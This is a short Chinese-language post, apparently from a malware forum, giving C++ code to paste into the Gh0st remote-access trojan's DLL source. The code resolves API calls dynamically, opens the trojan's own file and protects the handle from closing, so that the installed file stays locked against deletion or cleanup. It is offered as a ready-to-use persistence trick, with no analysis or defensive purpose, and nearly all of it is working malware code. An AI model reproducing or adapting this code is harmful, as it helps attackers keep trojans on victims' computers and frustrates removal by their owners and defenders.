最近很多人问我关于Gh0st占坑的问题.其实很简单的.只要把下面的代码添加到dll的源码里就可以了
DWORD WINAPI FilePro(LPVOID)
{
GetModuleFileNameAT pGetModuleFileNameA = (GetModuleFileNameAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetModuleFileNameA");
CreateFileAT pCreateFileA = (CreateFileAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"CreateFileA");
OSVERSIONINFOEX osvi;
ZeroMemory(&osvi, sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
GetVersionEx ((OSVERSIONINFO *) &osvi);
if(osvi.dwMajorVersion != 6 )
{
char szFileName[MAX_PATH];
pGetModuleFileNameA(CKernelManager::g_hInstance, szFileName, MAX_PATH);
HANDLE hfile= pCreateFileA(szFileName,GENERIC_READ, NULL, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
SetHandleInformation(hfile, HANDLE_FLAG_PROTECT_FROM_CLOSE, HANDLE_FLAG_PROTECT_FROM_CLOSE);
}
return 1;
}
调用
HANDLE hThreadu = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)FilePro, NULL, 0, NULL);
